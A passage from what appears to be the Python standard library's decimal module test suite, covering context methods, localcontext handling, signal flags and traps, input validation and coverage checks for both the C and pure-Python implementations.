Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
